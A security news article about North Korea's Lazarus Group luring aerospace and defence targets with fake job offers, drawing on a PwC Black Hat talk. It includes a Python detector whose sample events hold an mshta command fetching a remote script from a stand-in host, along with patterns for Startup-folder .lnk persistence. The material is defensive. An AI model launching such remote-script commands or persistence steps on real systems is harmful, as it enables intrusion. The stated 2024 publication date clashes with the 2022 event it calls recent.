State-Sponsored APTs Dangle Job Opps to Lure In Spy Victims

Published : 23/11/2024   Category : security




APTs continue to exploit the dynamic job market and the persistent phenomenon of remote working, as explored by PwC at Black Hat USA.



Fake job offers have become a top phishing tactic for state-sponsored threat actors to lure in unsuspecting targets in the wake of the COVID-19 pandemic, as many reconsider their careers amid growing demand for skilled workers and managers.
The cyber-threat analyst team at PwC, which has closely followed a prime example of this (the Lazarus Group's Operation In(ter)ception), presented a detailed account of the Lazarus campaign and how the group implemented the strategy during last week's Black Hat USA 2022 conference in Las Vegas.
PwC principal threat analyst Sveva Vittoria Scenarelli, who studies advanced persistent threats (APTs) in the Asia-Pacific region with an emphasis on North Korea, noted that the stakes are high.
"This is an espionage-motivated campaign that is incredibly persistent in targeting the aerospace sector, the defense industrial base, manufacturing chemical sector, for everything from military secrets to intellectual property to confidential information of strategic interest," Scenarelli explained during her presentation at Black Hat, titled "Talent Need Not Apply: Tradecraft and Objectives of Job-themed APT Social Engineering."
The Cybersecurity & Infrastructure Security Agency (CISA) agrees, and has warned that the threat actors (aka APT38, Black Artemis, BlueNoroff, Hidden Cobra, and Stardust Chollima) employ malicious cyber activity to collect intelligence, conduct attacks, and generate revenue.
Scenarelli explained that Lazarus follows up with its targets via messaging apps such as WhatsApp.
"This is to make sure that the victims do open the malicious viewer documents or the malicious executables that the threat actor has sent," she said. "Black Artemis will also set up domains. This can be for command and control of its malicious implants, to send emails that appear to come from a legit site, or indeed to perform Web exploitation as an initial access method."
Scenarelli explained that Black Artemis creates domains that spoof prominent job search websites like Indeed, with attractive positions at high-profile companies such as Google and Oracle. She underscored that many sites look legitimate, though there are obvious signs they are fake. "For instance, the Indeed decoy site URL is Indeed.US.org," she said. Scenarelli noted that the job descriptions, disguised as .docx, .pdf, or .rtx files, launch when victims click on the documents, which may enable macros.
Similarly, Scenarelli recalled another attack by the group, which made off with $625 million in cryptocurrency. She warned that this variant, which PwC researchers call Black Alicanto, is financially motivated and dangerous. In the wake of Microsoft recently disabling macros in Office documents, Scenarelli said this malware might use .lnk files, perhaps embedded in password-protected Microsoft Word documents.
"Threat actors are having to pivot a bit in their initial access techniques and using more and more .lnk files, ISO files, MSI installers, and stuff like that," she said. But in the background, she noted, the .lnk file is calling mshta.exe, which connects to a remote server to pull down a malicious JavaScript script that PwC calls Cabbage Loader.
"This script places a .lnk file in the victim's startup folder to ensure persistence and then pulls down a whole series of other JavaScript payloads," she explained. "These are essentially profilers that want to make sure that the actual person that's interacting with them is not a sandbox, is not a researcher, but it's actually a target of interest."
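As an added illustration (not code from PwC's talk or from this article), the following Python detector looks for the chain described above in endpoint telemetry: mshta.exe launched with a remote script URL, and a .lnk subsequently written into a Startup folder by a script host. The event format, the `jobs-example.invalid` domain and all file paths are constructed for the example.

```python
import re

# Constructed, hypothetical endpoint telemetry (not real logs): simplified
# process-creation and file-creation events in a Sysmon-like shape.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe http://jobs-example.invalid/offer.hta"},
    {"type": "file", "image": r"C:\Windows\System32\mshta.exe",
     "path": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    # Local .hta run by an installer: no remote script, so not flagged.
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\setup.hta"},
    # A .lnk on the desktop is not persistence; ignored.
    {"type": "file", "image": r"C:\Windows\explorer.exe",
     "path": r"C:\Users\alice\Desktop\Job Description.lnk"},
]

REMOTE_ARG = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)
STARTUP_LNK = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.IGNORECASE)
SCRIPT_HOSTS = ("\\mshta.exe", "\\wscript.exe", "\\cscript.exe")


def detect(events):
    """Return (rule, detail) findings for the mshta / Startup-folder chain."""
    findings = []
    saw_remote_mshta = saw_startup_lnk = False
    for ev in events:
        image = ev["image"].lower()
        if ev["type"] == "process" and image.endswith("\\mshta.exe") \
                and REMOTE_ARG.search(ev["cmdline"]):
            findings.append(("mshta_remote_script", ev["cmdline"]))
            saw_remote_mshta = True
        elif ev["type"] == "file" and STARTUP_LNK.search(ev["path"]):
            # Any .lnk dropped into Startup deserves a look; one written by a
            # script host matches the loader behaviour described and is high.
            sev = "high" if image.endswith(SCRIPT_HOSTS) else "medium"
            findings.append((f"startup_lnk_{sev}", ev["path"]))
            saw_startup_lnk = saw_startup_lnk or sev == "high"
    # Both stages together are the chain worth paging on, not just the parts.
    if saw_remote_mshta and saw_startup_lnk:
        findings.append(("loader_chain", "remote mshta followed by Startup .lnk"))
    return findings


if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"{rule}: {detail}")
```

Real deployments would key the correlation on host and time window rather than on a flat event list, but the two indicators are the same.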
Scenarelli concluded that Lazarus and other North Korea-based threat actors continue to exploit the growing demand for skilled people, who, despite their training and awareness of threats, can be caught off guard.
"The job market right now is a really key area for North Korea-based threat actors," she said. "So, keep your eyes peeled, make sure you're aware of whom you're interviewing. And for the love of all that is holy, don't open those links that you get sent on LinkedIn, do not open them."
